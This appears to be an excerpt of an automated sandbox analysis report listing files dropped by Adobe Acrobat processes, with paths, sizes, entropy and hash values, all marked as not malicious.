SHA-512: | FBD87A375F08CC3295267954C61EC19E9BA85D4B4F561319127EFD1352990B020E510B4A2D999D780AB5D36988ADF4830CC3763140BE85E6C3A1A052FEBD492F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.163760302635916 |
Encrypted: | false |
SSDEEP: | 6:iO4odVnGu3+q2PN72nKuAl9OmbnIFUtSodV4ZmwsodVIVkwON72nKuAl9OmbjLJ:7vHGuOvVaHAahFUtRY/7A5OaHAaSJ |
MD5: | 09C567121502A817AD9ADE89D6F1B613 |
SHA1: | 600DD89446DB11970B5DAB670B783C2617DBDD01 |
SHA-256: | AB2579469E3158CBF2660EF2D009EF1EAB300BB8707BC56BFD151DC57E32FD06 |
SHA-512: | 3324DC9F7687B2004FBA70FFF2B5B837A061A8F9A1A777F2BA1F13CB7A088903ECC400BB31C5ACB149D55D8376FBA6470D8BFF8828FF2805E53F8F2094C0BA5D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.163760302635916 |
Encrypted: | false |
SSDEEP: | 6:iO4odVnGu3+q2PN72nKuAl9OmbnIFUtSodV4ZmwsodVIVkwON72nKuAl9OmbjLJ:7vHGuOvVaHAahFUtRY/7A5OaHAaSJ |
MD5: | 09C567121502A817AD9ADE89D6F1B613 |
SHA1: | 600DD89446DB11970B5DAB670B783C2617DBDD01 |
SHA-256: | AB2579469E3158CBF2660EF2D009EF1EAB300BB8707BC56BFD151DC57E32FD06 |
SHA-512: | 3324DC9F7687B2004FBA70FFF2B5B837A061A8F9A1A777F2BA1F13CB7A088903ECC400BB31C5ACB149D55D8376FBA6470D8BFF8828FF2805E53F8F2094C0BA5D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.142118418302462 |
Encrypted: | false |
SSDEEP: | 6:iO4odVHX4q2PN72nKuAl9Ombzo2jMGIFUtSodVt/vJZmwsodVfGXv3DkwON72nK3:7vX4vVaHAa8uFUtRN/vJ/7OXvD5OaHAv |
MD5: | 3F9FCDFFF95AA92FAD37ADBBAAAC8F43 |
SHA1: | 8F5D465F398867734A7ED13743289D4C52549520 |
SHA-256: | 995365E9B228F1114DF7DF2BB8B11EF29E30D3688D3DB13C2006EB752009AA9E |
SHA-512: | 74F57B13FA95B912066B7523CA5DDC2F9C33C2BBDBB95A37A855A592A808E76767C197B93EE86A30B41931D230DA1C44396262C4E05A6ACA57A04DC9DB9A2BD3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.142118418302462 |
Encrypted: | false |
SSDEEP: | 6:iO4odVHX4q2PN72nKuAl9Ombzo2jMGIFUtSodVt/vJZmwsodVfGXv3DkwON72nK3:7vX4vVaHAa8uFUtRN/vJ/7OXvD5OaHAv |
MD5: | 3F9FCDFFF95AA92FAD37ADBBAAAC8F43 |
SHA1: | 8F5D465F398867734A7ED13743289D4C52549520 |
SHA-256: | 995365E9B228F1114DF7DF2BB8B11EF29E30D3688D3DB13C2006EB752009AA9E |
SHA-512: | 74F57B13FA95B912066B7523CA5DDC2F9C33C2BBDBB95A37A855A592A808E76767C197B93EE86A30B41931D230DA1C44396262C4E05A6ACA57A04DC9DB9A2BD3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\86b4ac49-8208-4a22-bc9d-4a96b1dbdcf4.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.977203904269378 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqCtsBdOg2HOcaq3QYiubcP7E4T3y:Y2sRdsWdMHx3QYhbA7nby |
MD5: | 04C66916CF27813B2645625EB65ABAD3 |
SHA1: | 311E6AD51F5EE2B0787F5F6E01613A1591A90CF8 |
SHA-256: | CB21EBA6603FBAADE4E75B68C9776B68AE3C79CC89E0E6638A19709909F767F8 |
SHA-512: | 9E9A7AA2CD885E7CF179D4608BBBC5B2F123389DC69978425D583788C79DA2ED05747E1962C5494659B36C019635263B019ADD603EB789C394335F2607224B00 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.977203904269378 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqCtsBdOg2HOcaq3QYiubcP7E4T3y:Y2sRdsWdMHx3QYhbA7nby |
MD5: | 04C66916CF27813B2645625EB65ABAD3 |
SHA1: | 311E6AD51F5EE2B0787F5F6E01613A1591A90CF8 |
SHA-256: | CB21EBA6603FBAADE4E75B68C9776B68AE3C79CC89E0E6638A19709909F767F8 |
SHA-512: | 9E9A7AA2CD885E7CF179D4608BBBC5B2F123389DC69978425D583788C79DA2ED05747E1962C5494659B36C019635263B019ADD603EB789C394335F2607224B00 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.2518908088578655 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7Pq7Xe:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhH |
MD5: | 3F67F94C72E37128DCE37993A33FC5F7 |
SHA1: | E5651CE6BA14A82850C9567E48B93B6358267400 |
SHA-256: | 06C4F37DC80301A3032DFB2C5B34DD28F444AB78CEB6C0C6E07672485F8317A3 |
SHA-512: | 48C097929D5A488A8108B027B819001C4DEB6F7608F13E5BF6B2FA0DF434171505645B11BB4E2DA7CA382AB08BEAD1E58E11E1FBFCFA59059DA62023212226D4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.112802179515838 |
Encrypted: | false |
SSDEEP: | 6:iO4odGC4q2PN72nKuAl9OmbzNMxIFUtSodXXJZmwsodaDkwON72nKuAl9OmbzNMT:7v8C4vVaHAa8jFUtRhJ/7kD5OaHAa84J |
MD5: | 34E72815D40AE6BEAC4D4FB902EAA0CF |
SHA1: | ECF6095FFC0D2A154508C23B0517541FF5C8451C |
SHA-256: | 8D402366FAE28A7CAD0DB09E0DD1CE00B45AFEF49A0C5B20A99A5F84AC5AF6CE |
SHA-512: | 64D4C8F39D54A5CCD88968425D577D686DB7ED26DA2FCDAB3CEB07D427923D0A2BA64D3871AAB0DDD4897C3B79DAACB4C6D43653CBF9F1322CC136EAF00C1DB7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.112802179515838 |
Encrypted: | false |
SSDEEP: | 6:iO4odGC4q2PN72nKuAl9OmbzNMxIFUtSodXXJZmwsodaDkwON72nKuAl9OmbzNMT:7v8C4vVaHAa8jFUtRhJ/7kD5OaHAa84J |
MD5: | 34E72815D40AE6BEAC4D4FB902EAA0CF |
SHA1: | ECF6095FFC0D2A154508C23B0517541FF5C8451C |
SHA-256: | 8D402366FAE28A7CAD0DB09E0DD1CE00B45AFEF49A0C5B20A99A5F84AC5AF6CE |
SHA-512: | 64D4C8F39D54A5CCD88968425D577D686DB7ED26DA2FCDAB3CEB07D427923D0A2BA64D3871AAB0DDD4897C3B79DAACB4C6D43653CBF9F1322CC136EAF00C1DB7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.4446660680217995 |
Encrypted: | false |
SSDEEP: | 384:SeSzci5tuz0yKiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhB:WXuz0yls3OazzU89UTTgUL |
MD5: | 0BAD843B878086E044023299C0DEC65D |
SHA1: | 2F97FE072200B800D3E7A4956B3A9D32B96EF440 |
SHA-256: | 8C5F680950FFBA8CC3D6C07C3FEF7F4F07831F7EB3D32CD1CA7AAF10A36C19DD |
SHA-512: | AA1B75197DB5CFBF42A6450E4662D4196E7A374B1C9ADFBC510AB663DDD8A094B67C8A8B9612ACE5F6A7D5A7DCC9A3C7B7380AE7BA2F2C1D317542BA423A7880 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.214301187967261 |
Encrypted: | false |
SSDEEP: | 48:7MzBnCLfqPmFTIF3XmHjBoGGR+jMz+LhzZ:7IBn+79IVXEBodRBkz |
MD5: | 30804EBBCADE7499E5D028F5E3B02972 |
SHA1: | 98034C65CC50BF35637BFD171902834F5B6192A6 |
SHA-256: | 05B738BAE13CDD347273CF2B295385A6A74DB6F14A87F9F50335AAAA34A75EA4 |
SHA-512: | 220CD32D2700C5B85ADC9A6BFCC5E2533ABFB30DEAD38EF1EE536E5BF771FA599F862E54A50919C4478C614B5F1B96F7E22D1A0F4D74E50071B4C50AFCC1D3F0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7647458239154146 |
Encrypted: | false |
SSDEEP: | 3:kkFklE2GSDtfllXlE/HT8kujXNNX8RolJuRdxLlGB9lQRYwpDdt:kKdUDeT8jdNMa8RdWBwRd |
MD5: | 88FB54DDCEC5E7A945744DC4DE39AB7C |
SHA1: | 3064B7FE028DDC021DF8F71FF9B3028F89B95740 |
SHA-256: | 7533033994DD5C44CAE1AC1C1930C8AD29E173B5003ADF787E1A0B9832D191E1 |
SHA-512: | FF7C68A587F6B6FDD71C550DE7B3A1286574CB91DDF7FE9266C9DC7AFDB84037D8DFDB420B39D7471944F5C3557515219518444C80BA081FF9321BF20FA41F39 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.331454745692401 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJM3g98kUwPeUkwRe9:YvXKX7Chh0cwWfnGMbLUkee9 |
MD5: | 893EFEC8EF0018C7A6A29E378E7D89AC |
SHA1: | 16F5E3A5EB954ACB9927881C7CECE9DBE0DE5FB5 |
SHA-256: | 61AAEE9FAEA4BB3F2A77593BC668217992A1E237F4BB6CBF5FC9D915DE5D4FCE |
SHA-512: | E4A252352F58C77211C78D1B9AA2E91AA0621B8354AD3E44940677DD4ACF8E9D9A2C52895707C119749954E87815B3398FC5560F1A536659CE8CAF9019190F3F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.284140870673139 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJfBoTfXpnrPeUkwRe9:YvXKX7Chh0cwWfnGWTfXcUkee9 |
MD5: | 01682C89FA4103F963A7F52D5F853118 |
SHA1: | 880C359B1F6466222299A03264FC91C6716489CA |
SHA-256: | D803AEEC602DE93DE60009E6FD216A542516595C7CD2BC3F8EB5D12C33EFD2CC |
SHA-512: | EF6D21F5562FA3A7815634D7964A1BA624064AE7E9E63E70AA1B961396356E1730D86AEECA71431CB441651CE74A1AAC368FAC0F6383DBE44DA769827F234534 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.261901941044965 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJfBD2G6UpnrPeUkwRe9:YvXKX7Chh0cwWfnGR22cUkee9 |
MD5: | 8A6A5499F31F5B03BC14A5A2DEE355E2 |
SHA1: | E5D6A4B4317152E0539835819324A80D9774594E |
SHA-256: | 52AFBACD155523FDCE50C187B6008EA0675637CF9BD056CD6CC628424489BD88 |
SHA-512: | 499EABCB11BD0C97FF5D64550F9110851066FF07FE25755D90B80169812B22FD856BCFD9D58795732CBE251D9698F324DE39B19D470EE74ED6D1A8E3FB226AED |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.310357719930907 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJfPmwrPeUkwRe9:YvXKX7Chh0cwWfnGH56Ukee9 |
MD5: | 8D9F7E0924B8EB8973DD20233E96A448 |
SHA1: | 61936129915FE6DD724E052CBA64E6451E7FA958 |
SHA-256: | D91B5D551B4DAFDB0EC44CF25600CAE791179FA796F946285E921D08921AAF0B |
SHA-512: | 0A3CF3E096F88EF1BB3E30EEAA7C1FFB09C6C23A84B91A0D382D286C2AEFC98BAC9028C3299F2B93C3E9283A09DF96A37CD4D01ECF9FD3D3BB103E78C05BACFB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.685676912686977 |
Encrypted: | false |
SSDEEP: | 24:Yv6XOhjwdpLgE9cQx8LennAvzBvkn0RCmK8czOCCSuY:YvHadhgy6SAFv5Ah8cv/X |
MD5: | 9D48C1E880869ADBFD8AFCA22B06D304 |
SHA1: | 7D297D7071EC91996711E36B54967BD33ED85E2E |
SHA-256: | E464B79B6EBD9B5FB43AC7266DD1BB16404B29192DE20358398F7D0F9FF7D6E0 |
SHA-512: | 203FB48B567055D56CD617281E024F2B02A0E42973CDAA78A4BB9279BF1928EA730CC74915400736C0311CC603C0101E1FF76B7E29BECCC3224E8BB4BD7F9077 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.261292714164699 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJf8dPeUkwRe9:YvXKX7Chh0cwWfnGU8Ukee9 |
MD5: | 527825C7681EDBC13E6253E94D4534E4 |
SHA1: | 2502FED5B3D2150F23986987F741DA0A2AEE03B1 |
SHA-256: | 3E0521CECD3019E9F509EFF9677F6465EE58BBE294E765831725A5460C509F53 |
SHA-512: | 56800D38A93510E767056BBBDCF105ACE389B4E9247A2608A02AABABCD49EBD39DFD36AB66D6176D94403D6508D9DF7D7E3BA75E45CE65BB40475A8B3DC705F2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.264633443297104 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJfQ1rPeUkwRe9:YvXKX7Chh0cwWfnGY16Ukee9 |
MD5: | 4B5C3E57AB7A5CA63D1EA6AD1A759EA6 |
SHA1: | DF6D9D3375C171EB44AFFB270F733DAD97761F74 |
SHA-256: | 9CDEBDA23DC176B95062B6A91F0184E1DEAB044E8C44A27387AB50CD37BE980A |
SHA-512: | 338323D9794A5469B2349ADFB466D3F2C53276542831A8E4290CBD4221B0EFB38A715CC4F17B348F5643E2D2539AD88A252F211E79DCF92A9F180F609A683AB2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.274914697507207 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJfFldPeUkwRe9:YvXKX7Chh0cwWfnGz8Ukee9 |
MD5: | C6910FD1311A43520DECB6C0178C6D53 |
SHA1: | 1711F80BA1A2D574103ADB81821286F708A6C776 |
SHA-256: | 29BC22FF9264B5320F39A539AC52D64483F68C6C7936A4110302A94AE0FCE5D7 |
SHA-512: | C7E06A6224E8CBE53BF3AAF8481C99CD1029E7F65B00FC6A34C70420754BBF43B36184B1B3BAC5E2DA5895A8D67B40374DB87CACF3C4DA89D638E40249AAB386 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.28933793249709 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJfzdPeUkwRe9:YvXKX7Chh0cwWfnGb8Ukee9 |
MD5: | 0E9290C7F287C21C4CEB5FE9F30F828B |
SHA1: | 9DEFD5F36BF2448B4D1882546943C305C8E3107D |
SHA-256: | 0002C28A2A41C86C006E48EB49B9814F8C052DDB68E016BB1B00447F6ECC9252 |
SHA-512: | F1E1AA3D246846D7BB0EF918243BD9D43598012052C4F2495E4E5CFB34515875658F5855C2D4AFFBB6F0F86FA6B799AED26FDE422E921B361C6C3F9A53F8530D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.269635782102028 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJfYdPeUkwRe9:YvXKX7Chh0cwWfnGg8Ukee9 |
MD5: | 233716BBA156CDFA6890EAEAAC5BFBB0 |
SHA1: | 30890C38A57DD7AB9263C2E33F3AA932E62A7E4F |
SHA-256: | 67A5A011E8B3E52F233316FE102C4A89967C664E50F1C0372DA5AA78A57BB805 |
SHA-512: | DD2998842AD2ACB5D8F3F5E694BA53134B587EF4103F73A99290B99F3F033EB38F826D6370F98B2564D432F7E87B2EA5CDFB20D0C053086076B27D35482AD1AB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.255450564551523 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJf+dPeUkwRe9:YvXKX7Chh0cwWfnG28Ukee9 |
MD5: | 00316C7448E9767B7B1122B6A8D84B9D |
SHA1: | 00A5D2E99E66FB587B1A4E630DDDE947902F0D2E |
SHA-256: | FA0FB35FE65162939727BBAC60F5BDCC23D82190FF56556F628F549265264EC4 |
SHA-512: | 59A6E4D4CF7D368FCD71102A2FA91765E077E80E9B0CD97FEAC3A074DAD36616CC801BB5E30F068BE6C132913CDF7EAE622A027C32152F1BC25499D62B7CE489 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.253391568558697 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJfbPtdPeUkwRe9:YvXKX7Chh0cwWfnGDV8Ukee9 |
MD5: | 8ED1743C689E803EF858E785E406BACE |
SHA1: | 970BA497992145D724ABA9B25AF07E8C6D2D069B |
SHA-256: | B42E25A5D57974E118220C616174053797698A35C033D76F151A2754CDF250B9 |
SHA-512: | F59310A44B0B36CBE9A8F3A045B057D80D15808F58952B8D21A919AB4D15E2F8252A96EE9F615889BA1C4045D0EF8193C1F41668FC039E60476D51CB84232E67 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.256648468339135 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJf21rPeUkwRe9:YvXKX7Chh0cwWfnG+16Ukee9 |
MD5: | 0EDF1C478D91F1665C954F4FC07E761D |
SHA1: | 5A48A4B78636A085621C11475C26EA1E4F435F8A |
SHA-256: | C06F48794B9AE680B0EFBDF78FBD64DA94CA0029FE33E2CF8ED10E28D111AFC5 |
SHA-512: | 65A308A96DD176E4DA124F328E6DD60951171C443E1078D9772DDC9C857C165D6014DA8F0B594BA9C8DFBC09D56F733DFBF7886F740AB4D98A48967F5A504EE0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.66100710984381 |
Encrypted: | false |
SSDEEP: | 24:Yv6XOhjwlamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSuY:YvHaZBgkDMUJUAh8cvMX |
